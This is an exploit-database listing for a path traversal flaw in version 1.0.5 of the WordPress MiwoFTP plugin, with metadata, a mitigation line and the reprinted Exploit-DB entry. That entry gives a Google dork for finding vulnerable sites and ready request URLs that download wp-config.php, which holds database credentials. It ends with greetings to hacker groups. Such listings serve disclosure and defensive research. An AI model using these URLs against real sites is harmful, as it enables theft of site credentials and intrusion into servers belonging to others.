header-logo
Suggest Exploit
vendor:
MiwoFTP Plugin
by:
Dadou Dz
5.5
CVSS
MEDIUM
Arbitrary File Download
22
CWE
Product Name: MiwoFTP Plugin
Affected Version From: 1.0.5
Affected Version To: 1.0.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 / Mozilla Firefox, Linux / Mozilla Firefox
2015

WordPress MiwoFTP Plugin 1.0.5 <= Arbitrary File Download

The WordPress MiwoFTP Plugin 1.0.5 allows an attacker to download arbitrary files from the server by exploiting a vulnerability in the 'download' action of the 'com_miwoftp' component. By manipulating the 'item' parameter in the URL, an attacker can specify the file they want to download, such as the 'wp-config.php' file.

Mitigation:

Update to the latest version of the MiwoFTP plugin or remove it if not needed. Ensure that the plugin is from a trusted source and regularly monitor for any suspicious activity.
Source

Exploit-DB raw data:

######################

# Exploit Title : WordPress MiwoFTP Plugin 1.0.5 <= Arbitrary File Download

# Exploit Author : Dadou Dz

# Software Link : Premium

# Dork Google: inurl:com_miwoftp

# Affected version: 1.0.5

# Vendor Homepage:
http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog


# Date : 2015-04-20

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
######################

# Exploit:
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=[....somefile....]&order=name&srt=yes
"download_file" : wp-config.php
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes



#####################

Discovered By : Dadou Dz
           My Email - dadoudzdz@gmail.com
           fb: fb.com/Dz2Team
         [ Thanks To ]
Toxic Dz ~ faroukovic DZ _ PaWL _ bl4ck-dz _ Abdellah Elmaghribi

Algerian To The Core - Dz Team - 1337day Community Algeria - Fallaga Team

 AnonGhost Team -  Anonymous Dz - Backup Sec Dz

 Sec4ever.com - Gaza-Hacker.net - Dev-Tun.tn - Fallaga.tn - Aljyyosh.com -
dz-root.com

 And All My Freinds - All Muslims Hackers - All Algerian Hackers

#####################

Navigation

Suggest Exploit

Services By CQR